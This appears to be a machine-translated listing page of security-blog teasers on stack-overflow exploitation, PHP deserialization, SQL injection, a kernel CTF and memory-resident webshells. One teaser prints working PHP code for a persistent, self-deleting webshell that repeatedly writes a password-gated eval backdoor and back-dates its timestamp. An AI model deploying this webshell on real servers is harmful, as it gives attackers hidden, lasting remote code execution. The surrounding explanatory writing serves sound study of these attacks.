utilization – Page 2

Stack overflow to getshell analysis and utilization

Ret2text (system and / exist in the source program bin/sh) The control program executes the existing code (.text) of the program itself. Stack overflow, system() function and “/bin/sh” string exist. Modify the return address to the address of the system function through overflow, and then call /bin/sh as a parameter of the function, so that […]

Stack overflow to getshell analysis and utilization

Public account: Control Security EDU to share more technical articles, welcome to follow and discuss and learn together Table of Contents Ret2text (system and /bin/sh exist in the source program) 32-bit program 64-bit program: Ret2libc2 (the address of system in the source program does not exist/bin/sh) Bass segment Gets() function Readelf Ret2libc2 Ret2libc3 (the address […]

Analysis and utilization of PHP deserialization vulnerabilities

Serialization and Deserialization Serialization: The process of converting an object into a transmittable sequence of bytes. Deserialization: The process of converting a sequence of bytes into an object. Purpose: To achieve cross-platform storage and network transmission of objects. Functions in PHP serialize: serialization unserialize: deserialization <?php $aa=60; echo serialize($aa); ?> ->i:60 tip: After serializing the […]

Utilization and restraint of undead horses (based on conditional competition) and variant undead horses

The immortal horse is a memory horse. It will be written into the process and generate Trojan files in the specified directory indefinitely. Here is the PHP Immortal Horse as an example Test code: <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = ‘.test.php’; $code = ‘<?php if(md5($_GET[“pass”])==”098f6bcd4621d373cade4e832627b4f6″){@eval($_POST[test]);} ?>’; while (1){ file_put_contents($file,$code); system(‘touch -m -d “2018-12-01 09:10:12” .test.php’); […]

[Utilization of ldt_struct structure] RWCTF2023-Digging-into-kernel-3

ldt_struct structure For knowledge about this structure, please Google it yourself. Here we only talk about the use of ldt is Local Segment Descriptor Table (Local Descriptor Table) The structure is as follows, the size of the structure is 0x10: /* * ldt_structs can be allocated, used, and freed, but they are never * modified […]

[Network Security-SQL Injection (3)] SQL Injection—-An article teaches you access database SQL injection and injection point utilization

Foreword: This article takes the Fannuo enterprise website management system as an example to explain how SQL injection is performed in the access database, how to use injection points, how to determine the number of query fields, and how to use joint queries to expose database data, etc.; There were two previous articles that introduced […]

About Servlet memory horse utilization analysis

Servlet Tomcat server is a free and open source web application server. Tomcat is a core project in the Jakarta project of the Apache Software Foundation. Its early name was catalina and was later developed by Apache, Sun and other companies. It was jointly developed by Tomcat and an individual, and was renamed Tomcat. Tomcat […]

For Servlet memory horse utilization analysis 2345235324

Troubleshooting and solution paths for scenarios with high Linux disk IO utilization

As a DBA, it is inevitable to encounter performance problems (especially performance problems such as disk IO), so how should we troubleshoot performance problems when we encounter them? For example, in a high-concurrency business, the business response is slow and the processing time is long. How should we start to troubleshoot and solve the problem? […]